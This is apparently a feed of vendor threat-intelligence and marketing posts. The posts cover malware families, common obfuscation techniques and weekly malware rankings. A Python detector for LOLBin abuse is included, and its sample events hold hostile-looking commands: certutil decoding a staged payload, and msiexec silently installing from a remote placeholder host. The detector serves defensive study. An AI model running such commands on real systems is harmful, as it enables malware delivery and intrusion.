🔍 Fresh, actionable threat intelligence for security leaders.
This report covers three high-impact malware families affecting Windows and mobile environments:
🔹 Albiriox, an Android banking trojan offered as MaaS, combining VNC-based remote control and overlays to bypass protections in 400+ financial apps.
🔹 OctoRAT, a .NET-based Windows RAT with UAC bypass, credential theft, proxying, and full remote control for long-term access.
🔹 GuLoader, a downloader using heavily obfuscated PowerShell, shellcode, and process injection to deliver RATs and infostealers.
👨💻 Explore an exclusive report with IOCs, YARA, and detection insights in the TI Lookup Premium plan.
New to TI Lookup? Start a trial to explore more in-depth analyses of active threats and APTs.
🧠 SOAR works differently once alerts come with proof.
Integrating a sandbox into SOAR shows real behavior early, shortens MTTR, and cuts Tier 1 workload by up to 20%.
👉 Check out how this works in practice
88% of threats are visible in 60 seconds ⚡️ #ANYRUN’s Enterprise plan is built for organizations where missing a threat isn’t an option.
📈 Equip your SOC with early detection and rapid response for stronger defense and improved performance. Explore all the benefits for your team
🚨 Top Malware Obfuscation Techniques Observed in December
📈 We’ve tracked the most common obfuscation techniques that help threats slip past detection, slow down investigations, and stay active longer. Knowing which techniques attackers rely on most helps security teams prioritize detections that cover real-world attacker behavior, reducing alert noise and improving MTTD/MTTR.
1️⃣ Living-off-the-Land Binaries: 8,568 detections
Attackers abuse legitimate built-in system utilities such as msbuild.exe, certutil.exe, msiexec.exe, and regsvr32.exe to download, decode, and execute malicious payloads.
Because these binaries are trusted and widely used, their activity often looks legitimate at first glance, making LOLBin abuse hard for SOC teams to spot without behavioral context.
🔍 Explore examples and related activity using this TI Lookup search query
2️⃣ Advanced Packers and Multi-Layer Obfuscation: 6,908 detections
Malware increasingly uses packers such as UPX, as well as advanced or custom solutions like VMProtect, Themida, or proprietary loaders.
These samples apply multiple layers of encryption, anti-debugging, and sandbox checks. Payloads are unpacked gradually and only under specific conditions, slowing down analysis and detection.
🔍 Find examples in TI Lookup
3️⃣ String and API Call Obfuscation: 6,336 detections
Critical strings such as C2 URLs, function names, and file paths are stored in encrypted or fragmented form and reconstructed only at runtime.
API calls are often resolved dynamically, for example by hashing function names and resolving them via GetProcAddress, making static detection significantly harder.
🔍 Find examples in TI Lookup
4️⃣ In-Memory and Fileless Obfuscation: 2,395 detections
Malware minimizes or completely avoids writing payloads to disk. Instead, the core code is loaded directly into memory using legitimate mechanisms such as PowerShell, WMI, .NET Assembly Reflection, or process injection techniques like Process Hollowing.
Attackers also heavily rely on complex script transformations: variable name randomization, string fragmentation, and non-obvious language constructs.
🔍 Find examples in TI Lookup
🚀 Speed up detection and gain full visibility into complex threats with #ANYRUN. Sign up
#ExploreWithANYRUN
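To make the "behavioral context" point from item 1 concrete, here is an added detection example (not ANY.RUN's code) that scores process-creation events for the four LOLBins named above. It assumes a Sysmon-like JSON field layout (Image, ParentImage, CommandLine), and the parent-process list and sample events are constructed for illustration.

```python
import json
import re
from pathlib import PureWindowsPath

# LOLBins named in the post above, plus parents that rarely launch them legitimately (assumption).
LOLBINS = {"msbuild.exe", "certutil.exe", "msiexec.exe", "regsvr32.exe"}
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powershell.exe",
                      "wscript.exe", "cscript.exe", "mshta.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
PROFILE_PATH_RE = re.compile(r"\\AppData\\(?:Local|Roaming)\\|\\Temp\\", re.IGNORECASE)

def analyze_event(event: dict) -> list[str]:
    """Return why a process-creation event looks like LOLBin abuse; [] means no finding."""
    image = PureWindowsPath(event.get("Image", "")).name.lower()
    if image not in LOLBINS:
        return []
    parent = PureWindowsPath(event.get("ParentImage", "")).name.lower()
    cmd = event.get("CommandLine", "")
    reasons = []
    if URL_RE.search(cmd):                       # trusted binary pointed at a remote resource
        reasons.append(f"{image} given a remote URL on its command line")
    if parent in SUSPICIOUS_PARENTS:             # Office or script host is an unusual parent
        reasons.append(f"{image} spawned by {parent}")
    if PROFILE_PATH_RE.search(cmd):              # payload staged in a user-writable location
        reasons.append(f"{image} working on a file under a user-writable profile path")
    return reasons

def scan_log(lines) -> list[tuple[int, list[str]]]:
    """Apply analyze_event to JSON-lines input; return (RecordId, reasons) per hit."""
    hits = []
    for line in lines:
        event = json.loads(line)
        if reasons := analyze_event(event):
            hits.append((event["RecordId"], reasons))
    return hits

# Constructed sample events in a Sysmon-like field layout (not real telemetry).
SAMPLE_EVENTS = [
    {"RecordId": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r"certutil.exe -decode C:\Users\bob\AppData\Local\Temp\p.txt C:\Users\bob\AppData\Local\Temp\p.exe"},
    {"RecordId": 2, "Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"msiexec.exe /i http://files.example.invalid/setup.msi /qn"},
    {"RecordId": 3, "Image": r"C:\Windows\System32\regsvr32.exe",        # benign installer activity
     "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"regsvr32.exe /s C:\Program Files\Vendor\vendor.dll"},
    {"RecordId": 4, "Image": r"C:\Windows\Notepad.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"notepad.exe notes.txt"},
]
SAMPLE_LOG = [json.dumps(e) for e in SAMPLE_EVENTS]
```

Records 1 and 2 are flagged with two reasons each, while the vendor installer's regsvr32 call and the unrelated notepad event produce no finding.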
🚨 XWorm is up +174% in Q4 25, while Storm1747 increased its activity by 51%.
Explore major threats, TTPs, and APTs in our latest threat landscape report powered by data from 15K SOCs.
👉 Use this intel now to prevent incidents later
🚨 Tykit phishing kit is targeting hundreds of US & EU companies, stealing Microsoft 365 credentials using malicious SVG files and bypassing MFA through AitM attacks.
👾 View Tykit sample analysis
👉 Learn how this PhaaS works, who's being targeted, and how to defend your organization.
👨💻 How to turn threat data overload into better defense?
Build stronger security with unique, real-time TI Feeds. Keep your SIEM, XDR, TIP up-to-date with filtered malicious IPs, domains, and URLs that you can trust.
📈 See all the benefits for your security team
📈️ Clients don’t leave MSSPs because attacks happen.
They leave because they can’t see the value.
👉 Here’s how you can prove impact and retain customers in 2026
👨💻 All key challenges of SOCs, from low detection rates to overwhelming alert backlogs, can be tackled with threat intelligence.
👉 See how to achieve faster triage and 3x higher performance
Last week's top 10 threats by uploads 🌐
⬆️ #Xworm 563 (350)
⬆️ #Asyncrat 335 (176)
⬆️ #Warzone 289 (35)
⬆️ #Gh0st 241 (14)
⬆️ #Stealc 216 (180)
⬆️ #Quasar 211 (159)
⬆️ #Vidar 204 (184)
⬆️ #Remcos 169 (40)
⬇️ #Lumma 139 (167)
⬆️ #Reverseloader 108 (21)
👉 Explore malware in action
#Top10Malware
🚨 Discover how Salat Stealer exfiltrates sensitive data via UPX-packed payloads, session hijacking, and real-time surveillance while operating as a low-cost MaaS threat.
👉 Learn detection, prevention, traffic and behavior analysis
Phishing activity in the past 7 days 🐟
👉 Track latest phishing threats in TI Lookup
#TopPhishingThreats
⚠️ In Q4 2025, XWorm surged 174%, fueled by its flexibility across manufacturing and healthcare.
AsyncRAT and Quasar followed with 46% and 27% growth, showing open-source RATs outpacing commercial stealers.
📈 See key threats, TTPs, and APT trends in our latest threat landscape report, powered by data from 15K SOCs.
🚨 CastleLoader attacks government agencies, compromising up to 400+ devices at once.
Its unusual process hollowing via an AutoIt3 script is hard for EDR to detect.
👉 See full analysis with extracted runtime config, C2s, and IOCs.
📈 Improve your security KPIs by integrating #ANYRUN TI Feeds into your SIEM/XDR via STIX/TAXII.
Get fresh indicators from real-world attacks on 15K+ orgs, increasing detection accuracy, cutting dwell time, and reducing alert fatigue.
🚀 See how it works
🪝 We tracked a phishing campaign against Germany's largest manufacturing enterprise.
It abuses a CVE, delivers AsyncRAT, and has a low detection rate among most AV engines.
👉 Get actionable intel to detect it early